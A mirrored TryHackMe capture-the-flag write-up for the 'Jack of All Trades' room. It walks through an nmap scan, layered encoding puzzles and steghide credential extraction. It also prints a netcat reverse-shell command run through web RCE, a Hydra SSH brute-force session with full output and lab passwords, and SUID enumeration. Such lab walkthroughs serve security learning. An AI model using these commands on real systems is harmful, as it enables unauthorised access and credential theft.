Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-09-20 06:11:56 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/TryHackMe/Jack_of_All_Trades.md
AbdullahRizwan101 f1b98508e2
Add files via upload
2020-11-01 23:33:29 +05:00

7.6 KiB
Raw Blame History

TryHackMe-Jack Of All Trades

Abdullah Rizwan | 08:17 PM , 1st November 2020

NMAP

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-01 20:18 PKT
Nmap scan report for 10.10.103.231
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Jack-of-all-trades!
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
|   2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
|   256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|_  256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.76 seconds

PORT 22

Noramlly this is default port 22 but in this case it is http if you visit it on firefox it has restricted default ports like ssh , ftp and etc so inorder to enable we have to go to browser's about:config and a property to override theses settings

https://support.mozilla.org/en-US/questions/1083282

And we can access the page now

By looking at the source code

We can find two things /recovery.php and a base64 encoded text

On decoding the text

Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! Also gotta remember your password: u?WtKSraq

user name john maybe

Download those images

By looking at the source code and login with Jack and u?WtKSraq

GQ2TOMRXME3TEN3BGZTDOMRWGUZDANRXG42TMZJWG4ZDANRXG42TOMRSGA3TANRVG4ZDOMJXGI3DCNRXG43DMZJXHE3DMMRQGY3TMMRSGA3DONZVG4ZDEMBWGU3TENZQGYZDMOJXGI3DKNTDGIYDOOJWGI3TINZWGYYTEMBWMU3DKNZSGIYDONJXGY3TCNZRG4ZDMMJSGA3DENRRGIYDMNZXGU3TEMRQG42TMMRXME3TENRTGZSTONBXGIZDCMRQGU3DEMBXHA3DCNRSGZQTEMBXGU3DENTBGIYDOMZWGI3DKNZUG4ZDMNZXGM3DQNZZGIYDMYZWGI3DQMRQGZSTMNJXGIZGGMRQGY3DMMRSGA3TKNZSGY2TOMRSG43DMMRQGZSTEMBXGU3TMNRRGY3TGYJSGA3GMNZWGY3TEZJXHE3GGMTGGMZDINZWHE2GGNBUGMZDINQ=

This is base32 encoded text on decoding it

45727a727a6f72652067756e67206775722070657271726167766e79662067622067757220657270626972656c207962747661206e657220757671717261206261206775722075627a72636e7472212056207861626a2075626a20736265747267736879206c6268206e65722c20666220757265722766206e20757661673a206f76672e796c2f3247694c443246

Now this is hex text on decoding it

Erzrzore gung gur perqragvnyf gb gur erpbirel ybtva ner uvqqra ba gur ubzrcntr! V xabj ubj sbetrgshy lbh ner, fb urer'f n uvag: ovg.yl/2GiLD2F

This is ROT 13 (Shift Cipher)

Remember that the credentials to the recovery login are hidden on the homepage! I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S

On visiting the link

Now its says about Stegosauria , now we recently downloaded two images on our machines ,so that dinosaur one looks interesting on using steg hide --extract -sf [image.jpg]

So this a rabbithole , lets steghide on different image , the second jackinthebox.jpg also didn't worked but when grabbed the header.jpg it worked

 Username: jackinthebox
 Password: TplFxiSHjY

However this is not the credentials for SSH

Now this is a RCE execution we can run a reverse shell here

nc -e /bin/sh 10.14.3.143 4444

You can run any reverse shell you want but netcat one worked so lets roll with it

Now we are www-data can't run really do much so lets try to elevate our privileges,so lets enumerate the machine , upload linepeas

Linpeas didn't find anyhting useful so there is a file in ~ home directory jacks_password_list

Hydra

Now we need to specify the port number becasue it's not on port 22

hydra -s 80 -l jack -P password_list.txt ssh://10.10.103.231 -V
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-01 21:49:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:1/p:24), ~2 tries per task
[DATA] attacking ssh://10.10.103.231:80/
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "*hclqAzj+2GC+=0K" - 1 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "eN<A@n^zI?FE$I5," - 2 of 24 [child 1] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "X<(@zo2XrEN)#MGC" - 3 of 24 [child 2] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass ",,aE1K,nW3Os,afb" - 4 of 24 [child 3] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "ITMJpGGIqg1jn?>@" - 5 of 24 [child 4] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "0HguX{,fgXPE;8yF" - 6 of 24 [child 5] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "sjRUb4*@pz<*ZITu" - 7 of 24 [child 6] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "[8V7o^gl(Gjt5[WB" - 8 of 24 [child 7] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "yTq0jI$d}Ka<T}PD" - 9 of 24 [child 8] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "Sc.[[2pL<>e)vC4}" - 10 of 24 [child 9] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "9;}#q*,A4wd{<X.T" - 11 of 24 [child 10] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "M41nrFt#PcV=(3%p" - 12 of 24 [child 11] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "GZx.t)H$&awU;SO<" - 13 of 24 [child 12] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass ".MVettz]a;&Z;cAC" - 14 of 24 [child 13] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "2fh%i9Pr5YiYIf51" - 15 of 24 [child 14] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "TDF@mdEd3ZQ(]hBO" - 16 of 24 [child 15] (0/0)
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "v]XBmwAk8vk5t3EF" - 17 of 25 [child 13] (0/1)
[80][ssh] host: 10.10.103.231   login: jack   password: ITMJpGGIqg1jn?>@
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-01 21:49:54

Using netcat to get that image on our local machine

This is our user flag

Check for SUID


jack@jack-of-all-trades:~$ find / -perm /4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/strings
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/procmail
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
jack@jack-of-all-trades:~$